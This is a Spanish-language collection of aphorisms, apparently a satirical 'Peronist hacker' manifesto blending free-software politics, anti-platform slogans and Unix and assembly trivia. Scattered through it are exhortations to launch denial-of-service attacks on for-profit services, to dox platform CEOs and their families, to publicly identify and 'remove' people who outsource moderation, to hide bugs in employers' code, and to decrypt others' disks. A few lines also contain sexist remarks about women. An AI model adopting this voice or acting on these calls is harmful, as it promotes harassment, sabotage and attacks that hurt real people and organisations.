No se puede ser un hacker sin compilar al menos lo que se ejecuta.
El software Libre no es amor. El software libre es el mazo que
utilizamos para aplastar a nuestros enemigos.
El software libre consiste en miles de verdades, pero todas se reducen a
una frase: es justo compilar.
Eel software libre gira en torno a dejar que tu código fuente salga al
Tercer Mundo.
Dividan el todo en partes conectables por caños.
En Unix la unidad la dan los caños. En el Justicialismo, también.
El software privativo es un monstruo que hace devorar a los
programadores entre sí, pero será progresivamente eliminado por quienes
compilan software libre, y lo será en un futuro no muy distante.
El mal no existe en el hacking, sino en aquellas actividades
desorganizadas e indisciplinadas que corresponden al uso del cómputo por
el Capital.
Una vez que el kernel bootea, milagros son posibles.
Los verdaderos hackers invierten más tiempo en la organización,
instrucción, agitación y propaganda que en compilar y depurar.
Los hackers son como los peces, y las redes de datos el agua en el que
nadan.
La lucha telemática de los hackers es ofensiva por principio; mucho más
que en la guerra convencional.
Finalmente derrotaremos al imperialismo telemático merced del efecto
acumulativo de muchas campañas de denegación de servicio.
Muchos bandidos de la información posan como hackers, y es sólo
necesario corregir sus credos políticos para convertirlos.
La insurrección telemática y un clúster del pueblo libre no son sólo
naturales, sino inevitables.
Toda programación genuina se origina de la compilación in mente.
Esta lucha requiere una Masa de Hackers decididos y organizados, una CPU
lo suficientemente fuerte, enlaces adecuados para el asalto telemático,
y los recursos de almacenamiento suficiente para sostener operaciones
indefinidas.
La acumulación de Pings aumenta el Lag. Multiplicarlos por diez, cien, o
cien mil millones logra la victoria.
El tendido es un camino, el enlace es un derrotero.
Es sólo motivo del estado desorganizado de los hackers que las GAFAM
osan desafiarlos.
A aquellos programadores que han escrito para empresas, salvo los
elementos incorregibles, los hackers no deben dejarlos de lado, sino al
contrario, deben persuadirlos para que se viertan a la lucha y oculten
bugs indepurables en el código de quien les paga.
Es mas fácil cambiar el hardware de la masa que su software.
El único general que tiene Window$ es el General Failure.
A Window$ se lo arregla formateando.
Los protocolos son supremos.
Los protocolos de comunicación son difíciles de monetizar. Utilizalos
para combatir al Capital.
Combate las plataformas propietarias. Combate al Capital.
Implementar plataformas propietarias para mediar el discurso es
criminal.
El poder y toma de decisiones debe mantenerse en el Pueblo y en el
hacker que los conduzca.
La toma del poder por parte de un pequeño grupo de oligarcas que dominan
empresas comerciales de plataformas ha convertido a las redes de datos
en tecnoplantaciones. Esta nueva forma de esclavitud electrónica debe
ser erradicada de todos los enlaces.
Los verdaderos hackers cambian la gravitación de su uso telemático de
las plataformas a los protocolos.
Comunica tu módem con el de tus pares, no con una compañía.
La Internet primigenia se asentaba en protocolos. La actual aún lo hace:
disóciate de las plataformas.
Usenet utiliza un protocolo abierto, el NNTP, al que cualquiera puede
acceder utilizando variedad de aplicaciones.
R€ddit es sólo una plataforma controlada enteramente por una única
compañía de capital. Disóciate.
La denegación de servicios es una ofensiva de carácter táctico y
psicológico que los hackers emprenden pues su hardware no podría
competir en calidad y menos aún en cantidad con el de las
ciber-oligarquías.
Si existe una única compañía que ofrece un servicio informático único
para usuarios finales con fines de lucro, atácala.
Si alquien construye un servicio informático sobre una plataforma en las
redes de datos y desea controlarlo para lucrar, atácalo y avisa al
resto.
Muy raramente las plataformas protegen los datos de sus usuarias. En los
pocos casos que lo hacen, se debe a mera incapacidad técnica.
Rara vez pueden moderarse contenidos sin sofrenar expresiones.
Si ha de moderarse una Plataforma, que sea en beneficio del Pueblo.
Una plataforma basada en empresa no puede moderarse ni auto moderarse.
Pero en función social puede expropiarse.
Mejor que expresar es hackear.
Para proteger la privacía de usuaria final y su libertad de expresión,
mas que una plataforma moderada, se hace imprescindible un tejido de
protocolos telemáticos libres.
Además de asegurar la creación de servicios informáticos cristalinos,
los protocolos telemáticos libres minimizan el impacto del
comportamiento abusivo en línea.
No importa cuantas interfaces implementen los protocolos libres. Lo
mejor está en la diversidad.
Disóciate de plataformas privativas. Abraza las federadas.
Jamás alimentes tecno-esclavos. Adoctrínalos y hazlos perecer en una
lucha a muerte por su propia Liberación.
El comportamiento abusivo en línea puede ser destructivo.
Las plataformas en línea con fines de lucro subsisten sobre una relación
de poder injusta sobre usuarias cautivas.
Las plataformas en línea buscan cautivar usuarias.
Una usuaria cautiva es una tecno-esclava.
Nadie duda que las plataformas privativas basadas en empresas con fines
de lucro constituyen el coto ideal para el acoso, la propalación de
discursos de odio, ciberamenazas, el spam, así como la identificación
telemática maliciosa.
El doxxing o identificación telemática maliciosa debe ser vectorizada
únicamente contra aquellos CEOs de las plataformas privativas basadas en
empresas. Da cuenta de ellos y su heredad.
A una identificación telemática maliciosa ha de responderse con una
identificación telemática mayor.
La identificación telemática vectorizada contra los CEOs no es
maliciosa, es Justicia.
Quien terceriza la moderación de plataformas en trabajadores de
subsistencia con sueldos mínimos ha ser telemáticamente identificado y
telemáticamente removido de las redes.
No existe solución tecnológica alguna capaz de contextualizar
adecuadamente o prever intención.
No existe problema para identificar la intención de las redes sociales
basadas en empresas: siempre es malévola.
Una computadora es incapaz de reconocer sátira o la hipérbole, incluso a
un nivel que sería obvio para cualquier lectora humana. Abusa esta
funcionalidad contra bots de IA.
Las plataformas centralizadas no son la única fuente arbitral de lo que
se permite y no se permite en las redes de datos. Utiliza plataformas
fuertemente descentralizadas.
Un Conductor ha de saber utilizar las redes sociales basadas en empresa
como un muelle, acumulando tensión de sus tecno-esclavos. Cuando lo
necesite, la liberará.
Conserva tus datos en discos propios, sobre los cuales te reservas
control total y absoluto.
Encripta tus discos. Desencripta los ajenos.
Las usuarias deben ser capaces de hacer uso de sus propios datos
encriptados en un servidor opaco de uso transparente.
La seguridad informática no se hace por dinero.
La seguridad informática se hace para asegurar información.
Un protocolo no ha de tener valor monetario alguno.
La representación de valor no se hace con un protocolo.
Quien a un hash lo llama criptomoneda, le miente al fisco y le miente a
su bolsillo.
Si el criptoactivo paga impuestos, vale. Si no lo hace, es aire.
La complejidad mata.
La simplicidad mata bugs.
El mejor depurador es la simplicidad.
El hacker es un programador que compila por reflejo lo que el Pueblo
quiere.
Ciertas organizaciones de Capital - degeneradas por interés de control
abusivo - hacen uso del código fuente ya no como objeto de preparación y
estudio maquinal, sino como un instrumento para la dominación.
Muchas veces se ha dicho que el software privativo va tras el lucro,
pero el objetivo inconfeso es lograr la explotación del hombre a través
de las máquinas.
El tecno-oligarca puede volverse un tecno-esclavista con un solo clic.
Como trabajador organizado, jamás debes gozar de menos Derechos de los
que ostenta el sistema de cómputo de un tecno-oligarca.
Hoy, las "venas abiertas" del Tercer Mundo son las "venas digitales" que
cruzan los océanos, conectando un ecosistema técnico poseído y
controlado por un puñado de corporaciones.
Los cables transoceánicos a menudo son provistos por infraestructura de
fibra óptica propiedad de corporaciones como Googl€ y Fac€book, con el
propósito de extracción de datos y monopolización de los medios de
producción.
Los virus más complejos de MS-DOS estaban representados por cepas
capaces de seguir el tren infeccioso sector de arranque → intérprete de
comandos COMMAND.COM → Polimorfismo en base a cifrado → compresión
variable.
Nuestros hackers dominan un conjunto de habilidades de programación que
les permiten escribir código fuente de ejecución sumamente veloz.
Nuestros hackers afianzaron la técnica para convertir ideas en código
fuente.
Nuestros hackers son capaces de analizar nuestros problemas de formas
nuevas, y es esto lo que le permite encontrar soluciones de programación
novedosas.
Por años, los necios no han cesado de predecir la desaparición del
lenguaje C, afirmando que el mundo está listo para pasar a enfoques de
programación menos primitivos. No es casualidad que los mejores
programas estén escritos en C.
Es difícil trabajar con el lenguaje ensamblador, pero si lo utilizas
correctamente, obrarás programas con un rendimiento sin precedentes.
El lenguaje ensamblador por sí solo no hace un gurú. Simplemente hace un
programa de velocísima ejecución.
El lenguaje ensamblador unido a la sapiencia máxima, permite utilizar
hasta el último recurso de cómputo para impulsar al máximo el
rendimiento maquinal.
Solo el lenguaje ensamblador es el verdadero impulsor humano contra los
límites inherentes del hardware.
El programador examina los requerimientos de una solución, en algún
nivel de abstracción diseña una solución, y luego hace que el diseño
cobre vida en un a implementación de código fuente.
El programador de ensamblador debe realizar la transformación de la
especificación de la aplicación a código máquina enteramente por sí
mismo.
El programador de ensamblador debe recurrir, ante todo, a la
independecia. Y luego, a la auto-dependencia.
El programador de ensamblador debe - a diferencia de otros - tomar
absoluta responsabilidad de su código.
El programador de ensamblador debe ser capaz tanto de escribir cualquier
rutina directamente, como controlar la máquina al menor nivel práctico:
su sistema operativo, su BIOS, y su mismo hardware, en caso de ser
necesario.
Los lenguajes de alto nivel como C y Pascal invariablemente introducirán
ineficientes transformaciones adicionales a una implementación de diseño
en lenguaje ensamblador, sin importar cuán buena esta sea.
Los lenguajes de alto nivel proveen un marco de trabajo para el programa
completo, pero sus huecos deben completarse con funciones esotéricas
individuales escritas en lenguaje máquina.
Contrarresta la ineficiencia de la transformación del código fuente al
lenguaje máquina con la facilidad de uso de un lenguaje de alto nivel.
La llamada de subrutinas en lenguaje máquina no sólo es útil para
escribir rutinas propias en lenguaje máquina, sino que permite controlar
casi todas las funcionalidades del hardware (incluyendo entrada y salida
directa a sus periféricos).
Nadie evalúa un hardware al límite con su primer programa "Hola Tercer
Mundo!"; eso lleva tiempo y práctica.
La buena programación en ensamblador es un proceso altamente
individualizado. Sus resultados realmente se potencian - sin embargo -
al compartirlos en comunidad.
Los microprocesadores de la familia 808X se prestan muy bien al lenguaje
ensamblador, mucho más que otras arquitecturas populares.
Gracias a la naturaleza rebuscada del procesador 8088, su lenguaje
ensamblador difiere fundamentalmente de otros y su dominio suele ser
mucho más complejo.
El 8088 es, con mucho, el más lento de los microprocesadores utilizados
en las computadoras compatibles con IBM, por lo que no importa cuán
cuidadosamente se adapte el código a las sutilezas del 8088, este
funcionará mucho más pistero en un 80286 o 80386.
Cuando apareció la primer CPU 8086 a finales de los 70s, la tecnología
de semiconductores no estaba refinada como para poder integrarle
instrucciones de coma flotante. Hubo de disponérsela en un coprocesador
matemático opcional.
Para escribir programas ensambladores verdaderamente superiores,
necesitas saber qué hacen las diversas instrucciones y qué instrucciones
se ejecutan más rápido. Para ello revisa el manual de tu
microprocesador.
La programadora examina los requisitos de una aplicación, diseña una
solución según algún nivel de abstracción y luego hace que ese diseño
cobre vida en una implementación de código fuente.
El software de aplicación se orienta principalmente a tareas específicas
en contexto y función.
El software de aplicación significa, por sobre todas las cosas, la
habilidad, de actuar/computar/entretener por sí mismo.
Los lenguajes de alto nivel proporcionan entornos artificiales que se
prestan relativamente bien a las habilidades de programación humana,
para facilitar la transición del diseño imaginado a la implementación
maquinal.
El lenguaje Ensamblador no es mas que una representación humana del
lenguaje de la máquina.
El ensamblador proporciona un entorno de programación difícil (el
hardware básico y el software de sistemas de la computadora), pero los
programas correctos no sufren pérdidas de eficiencia por compilación.
Al escribir en Ensamblador, la programadora debe realizar completamente
por su cuenta la conversión de la especificación de la aplicación al
lenguaje máquina.
El ensamblador no es más que una herramienta que nos permite diseñar
programas en lenguaje máquina sin tener que pensar en códigos mnemónicos
en hexadecimal.
En el cómputo, el conocimiento nunca es suficiente.
Todo conocimiento del cómputo te permitirá escribir mejores programas.
El código fuente será de todos o no servirá a nadie.
Mantén al mínimo tanto la cantidad de ciclos de computadora como las de
bytes de memoria que necesita para correr.
Es posible lograr 2 o 3 órdenes de magnitud en la mejora de desepeño
informático de un programa utilizando lenguaje ensamblador, si estád
sispuesto a invertir en bytes adicionales para ahorrar ciclos de
computadora.
Genera grupos de tecno-defensa dedicados a remover las ganancias
económicas de la ecuación tecno-esclavista.
Obra por defecto en la resistencia telemática pasiva.
El uso de encriptación no puede clasificarse como radical.
El criptointercambio fraudulento es un oxímoron.
De existir una CPU que sirva sólo para intermediar en el control
oligárquico del Pueblo, ha de overclockeársela hasta quemarla.
Nosotros lo que buscamos es la auténtica Liberación del Pueblo, y esto
puede ser facilitado por quien - como reflejo preclaro de su alma - es
capaz de traducir este anhelo en código fuente licenciado bajo GPL.
La GPL es un contrato que dura mucho a futuro. Es una promesa de unión.
La liberación del hardware no implica un arduo trabajo intelectual de
ingeniería inversa, sólo basta instalar en cómputo propio, software
propio.
De la misma manera en que la Conducción se nutre de las Dinámicas de
Masas, es que las dinámicas de Cuantos afectan a los transistores.
El Mate, amargo. MATE, en castellano.
El choripán, de parado. El mail, cifrado.
El asado, con achuras. La netbook, con SSD.
La empanada, sin pasas. La netbook, sin Window$.
La cerveza, con pizza. El código fuente, con comments.
El fernet, con coca. GNU, con enseñanza.
El cinzano, con picada. El disco, particionado.
El gol, sobre la hora. El server de juegos, sin contraseña.
El Estado, sin Iglesia. El server, con puertos cerrados.
El sistema, Peronista.
En la Era de las redes sociales, érais un producto. En la Era de la IA
generativa, el dato de entrenamiento. Pero en la Era de la Justicia
Social 2.0, habéis actualizado vuestra alma con software bajo GPL para
constituiros en un potente vector de Liberación.
La constante de un oligarca es la variable de un peronista.
Si manipulas gran cantidad de datos, hazlo de una única forma:
peronista.
Es mucho más simple escribir un programa incorrecto que entender el
correcto.
Un lenguaje de programación es de bajo nivel cuando sus rutinas
requieren prestar atención a lo irrelevante.
Es mejor disponer 100 órdenes que operen sobre una estructura de datos
que 10 funciones en 10 estructuras de datos. El conductor es uno solo, y
la masa también.
Las estructuras de datos inteligentes y el código burdo funcionan mucho
mejor que en el caso inverso.
La raíz del cómputo es la recursión, donde se cambia descripción por
tiempo. La raíz de la organización es la doctrina, que evoca el mismo
ahorro.
Para entender la recursión, uno primero debe entender la recursión.
Todo programa tiene al menos dos propósitos: aquél para el que fue
escrito, y otro para el que no lo fué.
Ocultar información implica la necesidad de vigilar las sendas de la
comunicación.
La optimización atrasa la evolución.
Para comprender un programa, vuélvete máquina y vuélvete programa.
Visualiza la información compleja en tu mente. La CPU, en todo caso,
sólo podrá simplificarla luego que tú mismo la has simplificado.
La simplicidad del cómputo no precede su complejidad. Procede de ella.
Computacionalmente es dificultoso descubrir una unidad de tiempo
correcta para medir el progreso. Cuantifícalo en la variable de la
Felicidad del Pueblo.
A los hackers no se los mide por su ingenio y su lógica, sino por su
completitud analítica del caso de la felicidad computacional del Pueblo.
La cadena es una estructura de datos no parca, y en todo lado que se la
incluye es dable una prolégis que conlleve a la duplicación de procesos.
Es un vehículo perfecto para ocultar información.
Los programas más geniales ya están guardados en tu RAM en este preciso
instante. Tan sólo transforma en 0 los 1s sobrantes, y ordena su
ejecución.
Existen dos maneras de escribir un programa libre de errores. Hacerlo
privativo no es una de ellas.
Algunos lenguajes de programación son capaces de absorber cambios, pero
detienen el progreso.
Puedes medir la perspectiva de un programador notando su actitud frente
a la vitalidad de C.
Lo único universal en las arquitecturas de cómputo es el bucle
Programa-Felicidad del pueblo.
El objetivo del cómputo es la emulación maquinal de la capacidad humana
de hallar felicidad en comunidad.
Los sistemas cuentan con subsistemas, y los subsistemas tienen
sub-subsistemas, ad infinitum.
El programador de LISP conoce el valor de todo, y el costo de nada.
El software se encuentra bajo tensión constante. Siendo simbólico es
arbitrariamente perfectible, pero también arbitrariamente modificable.
Es más fácil cambiar la especificación para que haga caso al programa
que viceversa.
Los tontos ignoran la complejidad. Los pragmatistas la sufren. Algunos
pueden evitarla. Los genios la eliminan.
En programación, como en la vida, un error provoca un nacimiento.
Las constantes son efímeras.
Cuando escribas un programa que aprenda, no lo hará y tú sí.
El corazón procesa símbolos, la CPU números.
Cuantificamos nuestro entendimiento por el grado por el cual podemos
aritmetizar una actividad. Quien pretenda proceder por grado de control
ha de recibir un SIGKILL en la tabla de procesos.
El comando man es como un seguro: satisface porque casi nadie que la
utilice depende de su beneficio.
Los lenguajes de programación jamás han abandonado su saco embrionario.
las usuarias deben parametrizar los procesos, no sus creadores.
Quien compila un sistema operativo privativo no es un creador.
Simplemente un tecno-esclavista.
El intercambio cibernético entre la usuaria, la computadora y el
software es como el juego de la silla: en la busqueda desesperada de
equilibrio siempre deja a la que tiene culo en el piso.
Si su computadora habla el idioma de Braden, probablemente se deba a que
está hecha en China.
Un año invertido en el campo de la inteligencia artificial es suficiente
para hacerle a uno creer en Dios.
La arquitectura RISC va a cambiar todo.
A pesar de que los chinos deberían adorar a nVidia, es en RISC-V donde
ponen sus chirolas.
Uno no aprende cómputo por usar un smartphone, sino por dejar de usar un
smartphone.
Sacarle el software privativo de Googl€ a un teléfono inteligente no es
lobotomizarlo.
Si dudas en rootear tu smartphone, comienza por un celular muleto en
muletas al que no temas brickear.
No lo llamo teléfono inteligente, sino teléfono atontador.
En caso de necesidad, reemplaza los ranchos de adobe con estructuras en
base a smartphones brickeados.
La computadora es el contaminante perfecto. Sus feces son
indestinguibles del alimento que produce.
Las interfaces mantienen el orden, pero no pueden acelerar el
crecimiento. Las funciones sí.
Primero sé responsable por tu programa, luego escríbelo.
Las computadoras no organizan, simplemente exponen oportunidades para
hacerlo.
En la simbiosis mujer-máquina, la mujer debe ajustarse. Las máquinas no
pueden.
El tecno-oligarca llama éxito a resolver el problema equivocado.
No puede procederse de lo informal a lo formal por medios formales.
Formatea.
La prueba de valor de un sistema es su mera existencia. Destrúyelo y
comprueba su valía.
Cuando dos programadores se encuentran para criticar sus programas,
ambos guardan silencio.
La única teoría que conecta la neurociencia y la psicología surge del
estudio de la Doctrina Justicialista técnicamente implantada como
firmware en la mente colectiva de los Pueblos.
Podemos pensar que sabemos cuando aprendemos, y más cuando podemos
escribirlo, incluso más cuando lo enseñamos, pero podemos estar sólo
ciertos cuando lo distribuimos como software.
Adaptar viejos programas para que funcionen en máquinas nuevas a menudo
implica adaptar las nuevas máquinas para que se comporten como las
viejas.
Cuando alguien diga "Quiero un lenguaje de programación al cual sólo
necesite decirle lo que quiero hacer", denle un chupetín.
Un buen sistema no puede tener un lenguaje de programación débil.
Todo debe construirse de arriba a abajo. Excepto la primera vez.
Un programa que carezca de un bucle y una variable estructurada no debe
escribirse.
Opera en forma concertada para destrozar la industria publicitarla y
eliminarla de la cultura y la economía popular.
Si iba a decir "Hello World!", mejor que diga "Hola Mundo!"
Si iba a decir "Hola Mundo!", mejor que diga "¡Hola Tercer Mundo!".
Mas que "Hello World!", que diga "¡Viva Perón!".
Puedes correr la versión ejecutable de los comandos por su nombre de
identificación en el disco, pero hasta que los comandos se ejecuten o
esperan acceso a la CPU, no son procesos.
Un proceso es una orden en ejecución.
Un proceso consta de seis partes: vias estándar de entrada, salida y
error, el código del programa que se ha ordenado ejecución, junto con
los ambientes globales y locales que le dan sustento.
No asocie ningún retraso que ocurra con un error del sistema, porque los
comandos tardan diferentes tiempos en ejecutarse, dependiendo de su
complejidad de procesamiento.
La mayoría de los procesos tienen la misma prioridad, es decir, el mismo
derecho a usar la CPU, pero el sistema Unix cuenta con herramientas que
permiten cambiar la prioridad de un proceso.
La prioridad de proceso de tiempo compartido es la clase normal de
aplicaciones de usuaria.
La prioridad de proceso de tiempo real permite el uso del sistema Unix
para aplicaciones que requieren tiempos de respuesta limitados y
preestablecidos.
Los procesos en tiempo real siempre obtienen el uso del tiempo de la CPU
con prioridad sobre aquellos procesos de tiempo compartido.
Aumentar la prioridad del proceso generalmente resulta en una ejecución
más rápida del mismo, a expensas de otros procesos presentes en memoria,
que atrasarán su ejecución conforme se eleven los tiempos en que
aguardan la disponibilidad de la CPU.
Si bien el sistema Unix no establece un límite en la cantidad de
procesos en segundo plano, el rendimiento del sistema tiende a
degradarse ante el exceso de procesos.
Es posible concebir que además de usted, los Pueblos estén utilizando el
sistema multiusuario desde diferentes terminales conectados a la
máquina.
Los usuarios de una máquina constituyen un grupo de individuos que
tienen intereses comunes, como por ejemplo la comunicación, el
intercambio de ficheros, y la Liberación.
En Unix existe un delicado contraste entre la libertad de recorrer el
sistema otorgada a las usuarias y las restricciones que se les dictan en
consideración a la seguridad.
El sistema Unix proporciona herramientas eficientes para definir el
estado de seguridad de los identificadores de usuaria, ficheros y
programas de uso común y ficheros privados.
Dado que Unix es un sistema multitarea, muchas cosas pueden suceder en
memoria simultáneamente. Una mujer es similar.
Donde hay una necesidad, nace un software libre.
La mujer ha superado el período de las tutorías informáticas. La mujer
debe afirmar su acción, la mujer debe compilar.
Ha llegado la hora de la mujer que comparte su código y ha muerto la
hora de la mujer como valor inerte y numérico dentro de las redes
sociales basadas en empresas de Capital.
Ha llegado la hora de la mujer que programa, depura, compila o ejecuta.
Y ha muerto la hora de la mujer que asiste - atada e impotente - al
caprichoso manejo remoto del destino de su sistema.
Yo no me dejé arrancar las coreutils que copié de GNU, por eso no me
deslumbró jamás la grandeza de las GAFAM y pude ver sus miserias. Por
eso nunca me olvidé de las necesidades de mi Atom y pude ver sus
grandezas.
Tengo dos distinciones: el amor de los hackers y el odio de los
ciber-oligarcas.
No tenemos tiendas de aplicaciones, tenemos proveedurías de
aplicaciones. En ellas cada una toma lo que necesita.
Queremos un Pubnix pacífico, potente, y soberana y una masa de
programadores unida y feliz como ninguna.
Queremos el bienestar de los programadores, la dignificación de los
usuarios y la grandeza de este Pubnix que el Root nos ha dado y que
todos debemos defender como el más justa, el más libre y la más soberano
de las redes de datos.
Tenemos que convencernos para siempre: el software será de los pueblos
si los pueblos decidimos enardecernos en el fuego sagrado del fanatismo.
Cada uno debe empezar a dar de sí todo el código que pueda dar, y aún
más. Solo así construiremos el Pubnix que deseamos, no para nosotros,
sino para los que vendrán después, los programadores del mañana.
Lo único que debemos hacer es adquirir plena conciencia del código que
poseemos y no olvidarnos de que nadie puede distribuir sin acercarnos
sus modificaciones, que nadie puede hacer tampoco nada que contrario a
la GPLv3.
No alcanzarán los bugs para colgar a los Window$.
¡Sólo basta que los pueblos nos decidamos a ser dueños de nuestro propio
código fuente! Todo lo demás es cuestión de enfrentar al compilador.
Yo no quise ni quiero el código para mí. Mi gloria es y será siempre el
compilador GCC y el código fuente de mi pueblo.
Y aunque deje en el disco volcados de núcleo, yo sé que ustedes
emparcharán mis bugs y distribuirán sus copias hasta la victoria.
El correo electrónico funciona conceptualmente como el servicio de
correo tradicional: permite la comunicación entre usuarias, cada una de
ellas identificada por una dirección, y cada mensaje tiene un paquete y
un contenido.
El ejemplo más obvio de los nuevos medios de comunicación digitales es
el correo electrónico, pero existen muchos otros, y habrá aún más.
Los medios de comunicación digitales son inherentemente capaces de ser
más interactivos, participativos, igualitarios, descentralizados y menos
jerárquicos.
En Unix casi cualquier comando puede interrumpirse mientras espera los
datos de entrada utilizando Ctrl+d.
En el entorno Unix, no es posible recuperar un archivo eliminado con el
comando rm. Como precaución utiliza rm -i para solicitar confirmación.
Los comandos Unix generalmente disponen de muchos argumentos opcionales,
lo que ayuda a que el sistema sea extremadamente flexible y poderoso.
Los argumentos en los comandos del sistema Unix cumplen la misma función
que en M$-DO$ y otros sistemas operativos, es decir, modificar la
ejecución del comando.
El sistema Unix cuenta con un excelente sistema de archivos para
almacenar ficheros, comandos y aplicaciones.
Dado que Unix es un sistema multiusuario, inmediatamente exige poder
identificarte con absoluta certeza. De esta forma el sistema verifica tu
intención de acceder a los archivos privados y asigna a la sesión de
trabajo la prioridad que te haya sido establecida.
Cada usuaria que se conecta al sistema Unix es referenciada por un
identificador (Login ID). Para ser telemáticamente pseudoanónima, en
lugar de proveer tu nombre o iniciales, invoca cualquier otra cosa.
Puesto que Unix puede servir a muchas usuarias diferentes, y cada una
puede acceder a un conjunto de ficheros único, cuando el programa login
te interrogue deberás presentar un nombre válido de usuaria de sistema.
Al mecanografíar tu contraseña de usuaria de sistema Unix en el programa
login, la teletipo no la imprimirá; ni siquiera aparecerá monitoreada en
un terminal de video. Tras proveerla, presiona la tecla Intro o Retorno
de Carro para iniciar la comprobación que deberá finalizar con tu
logueo.
Unix utiliza el conjunto ASCII (American Standard Code for Information
Interchange), por lo que los terminales gráficos deben tener modo ASCII.
Dado que Unix se desarrolló originalmente para terminales teletipo, gran
parte del sistema requiere que los emuladores de terminales operen en
modo de caracteres.
Su terminal puede ser una consola del sistema, un terminal en modo de
caracteres conectado directamente a la máquina a través de un puerto
RS232, o un terminal remoto conectado a través de una línea telefónica y
un módem, o incluso un terminal conectado a través de una Red de área
local o ámplia.
Cuando la microcomputadora aumentó el rendimiento en términos de
velocidad y potencia, al mismo tiempo que disminuyó los costos, entró en
la esfera de acción del sistema Unix.
Como reguero de pólvora, las versiones BSD y AT&T de Unix se portaron en
casi todas las computadoras capaces de admitirlas.
Las máquinas basadas en 8088 eran casi lo suficientemente potentes como
para admitir el sistema Unix, pero solo unas pocas versiones pudieron
ejecutarse en estos ordenadores.
Las versiones de BSD dominaron como plataforma experimental de conceptos
de red, de modo que lo mejor para enlaces locales estuvo disponible en
los sistemas Unix casi inmediatamente.
El mayor experimento de red de área amplia, ARPANET, se orientó
inicialmente hacia los sistemas TENEX.
El sistema Unix se ganó el debido reconocimiento en la primera mitad de
la década de 1970, con el desarrollo de minicomputadoras potentes, como
la DEC PDP-11/45 y la PDP-11/70.
La versión original de Unix estaba escrita en ensamblador, pero dado que
el grupo de investigación también estaba desarrollando el lenguaje C en
esos años, inmediatamente fue reescrita con este nuevo lenguaje.
Unix nació esencialmente como una reacción a los sistemas operativos
grandes, complejos e inflexibles disponibles a fines de la década de
1960.
Las versiones recientes de Unix están estructuradas para un uso ameno y
funcional en las redes de transmisión de datos.
Unix es un sistema multitarea de tiempo compartido que puede afrontar
fácilmente varias tareas en paralelo. Que una de ellas sea combatir al
Capital.
En un sistema Unix, la programadora puede escribir un archivo, enviarlo
a una impresora y cursar correo a otra computadora simultáneamente,
gracias a su funcionalidad de multitarea.
Al ser un sistema multiusuaria, Unix les permite realizar muchas tareas
simultáneamente, dando a cada una de ellas la impresión de ser la única
operaria de la máquina.
En escencia, el scheduler se encarga de hacer infiel la CPU con sus
usuarios.
Cerrar sesión en el sistema evita que personas no autorizadas utilicen
su terminal, especialmente si este se encuentra en un lugar público.
Los dos factores más importantes que garantizan la seguridad del sistema
Unix son mantener seguras sus contraseñas y cerrar la sesión cada vez
que abandone el terminal.
Las contraseñas constituyen el corazón de la seguridad computarizada.
Existen pocos requerimientos para la calidad para una contraseña
informática: no debe ser adivinable ni figurar en un diccionario,
mientras que debe ser fácil de recordar, y se la debe cambiar cada pocos
meses.
Algunos sistemas Unix ocasionan que el proceso de cierre de sesión sea
inmediato al apagar el terminal o la consola. Los terminales que están
conectados a la máquina a través de líneas telefónicas y módems suelen
seguir este procedimiento.
En la terminología de Unix, un símbolo colocado al final de una línea de
texto generalmente se denomina carácter de nueva línea.
Por lo general, en las terminales, la tecla INTRO actúa como nueva
línea; en realidad, el carácter ASCII para el avance de línea es el
carácter de avance de línea (LF).
En la práctica, la tecla INTRO (CR+LF) goza del mismo efecto que LF; Vea
lo que le sucede a su terminal y sistema si finaliza una línea de texto
con LF (Ctrl-J) en lugar de INTRO.
La shell es el programa que aguarda los mandatos ingresados por la
terminal. Ordénale combatir a la oligarquía.
La shell recibe sus órdenes y las traduce en instrucciones en la
sintaxis interna del sistema operativo. Debéis conducir la Shell.
No hay código fuente para armar una comunidad. Esta debe dárselo.
Muchas de las funciones que ofrece Unix derivan de la shell, que por lo
tanto puede considerarse una parte integral del sistema.
Los comandos suelen ser programas que la shell busca y ejecuta en
respuesta a las órdenes tecleadas en la terminal.
La usuaria teclea, la shell cumple.
La shell permite conducir la máquina, pues es - ante todo - un
intérprete de comandos capaz de expandir y modificar la órden (de
acuerdo con reglas predefinidas) previa a su cumplimiento.
Los metacaracteres (comodines) y los operadores de redirección de
comandos cobran especial importancia, ya que pueden generalizar y
flexibilizar una órden en línea de comandos.
La estructura de una órden incluye generalmente, además del nombre del
comando, ciertos argumentos que representan las opciones, precedidos por
el signo -, así como nombres de fichero u otros identificadores de
usuaria.
En la sintaxis de comandos del sistema Unix, las opciones siguen al
nombre del comando y preceden a los argumentos principales.
Tres caracteres especiales, llamados comodines, pueden reemplazar todo o
parte de los nombres de archivo: son *, ? y un configurador de comodines
persoanlizables configurables entre corchetes [].
Un hacker avezado es capaz de programar guiones, rutinas, extensiones de
navegador, macros de hojas de cálculo y aplicaciones capaces de
contrarrestar -en CPU propia o ajena - aquellos esquemas de monitoreo y
explotación por software en el ámbito de Trabajo.
Dejada a la oligarquía, la implementación del teletrabajo sólo
acarrearía la importación de métodos de gestión informales al ambiente
laboral.
Hemos de impedir que las nuevas generaciones de trabajadores sean
alcanzadas por nuevas versiones de los llamados "software remotos de
gestión laboral".
Los llamados "software de gestión laboral" incrementan el alcance de las
métricas, y en consecuencia permiten a las empresas de Capital registrar
todos los aspectos posibles del comportamiento de sus trabajadores en
una tesitura que solo puede ser inconfesable.
La disciplina profesional se ha visto interpuesta como excusa para dar
lustre a la vetusta inescrupulosidad del Capital. Naturalmente, esto
también iba a ocurrir con el mal llamado software de gestión laboral.
Un software de gestión laboral en manos de un ciber-oligarca no podía
más que convertirse en una versión 2.0 del látigo.
No resulta extraño que estos programas de gestión laboral agreguen al
registro temporal tradicional, el desglose de tráfico de datos, rastreos
individualizados de historiales de navegación, métricas y medidas de
incumbencia telemática.
En el pasado los dispositivos del empleado resultaban invadidos con
metodologías de rastreos, biométrica por control de cámaras de video,
perfilado, registro y grabación de llamadas y mensajería instantánea, y
todo esto a granel.
Una vez el trabajador ha sido aislado en las redes de datos, verlo preso
de la biométrica como vector de circunstancialismo social, clasismo y
racismo no sería de extrañar.
Si les damos rienda a estos señores ciber-oligarcas, en poco tiempo
veremos el ingerencismo en la gestión de los recursos del Tercer Mundo,
tercerizado por megacorporaciones sin patria ni bandera.
De cumplirse el designio de estos señores feudales de los datos, al
software no sólo se lo emplearía como si de un viejo rebenque se tratara
- atizando a los trabajadores con el vacuo fin de producir datos que
validen al sistema de métrica estadística en sí - sino que también se lo
tornaría en molino y yugo, refinando la meta-producción de matriz
extractivista cautiva.
La explotación laboral está lo suficientemente reconocida como para que
los Trabajadores Informáticos sepan - por reflejo - que su principal
arma ha sido siempre organizarse.
El objetivo táctico de los hackers ha sido evitar la lucha innecesaria,
para empeñarse en la lucha necesaria, y hacerlo para vencer.
